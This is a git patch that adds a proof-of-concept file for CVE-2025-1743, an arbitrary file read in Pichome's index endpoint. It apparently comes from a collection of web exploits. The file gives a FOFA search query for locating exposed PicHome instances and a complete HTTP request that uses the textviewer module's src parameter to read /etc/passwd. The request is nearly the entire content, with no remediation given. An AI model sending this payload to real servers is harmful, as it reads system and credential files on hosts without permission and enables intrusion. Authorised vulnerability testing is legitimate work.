From c73be942054f8b4dce49cfac42f12f789762af9c Mon Sep 17 00:00:00 2001
From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com>
Date: Wed, 11 Jun 2025 15:04:39 +0800
Subject: [PATCH] =?UTF-8?q?Update=20Pichome=E6=8E=A5=E5=8F=A3index?=
 =?UTF-8?q?=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB?=
 =?UTF-8?q?=E5=8F=96(CVE-2025-1743).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...接口index存在任意文件读取(CVE-2025-1743).md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)

diff --git a/wpoc/Pichome/Pichome接口index存在任意文件读取(CVE-2025-1743).md b/wpoc/Pichome/Pichome接口index存在任意文件读取(CVE-2025-1743).md
index 8b13789..6d8fb9d 100644
--- a/wpoc/Pichome/Pichome接口index存在任意文件读取(CVE-2025-1743).md
+++ b/wpoc/Pichome/Pichome接口index存在任意文件读取(CVE-2025-1743).md
@@ -1 +1,19 @@
+# Pichome接口index存在任意文件读取(CVE-2025-1743)
 
+# fofa
+```
+title="PicHome"
+```
+# poc
+```javascript
+GET /index.php?mod=textviewer&src=file:///etc/passwd HTTP/1.1
+Host:
+Accept-Language: zh-CN,zh;q=0.9
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+
+
+```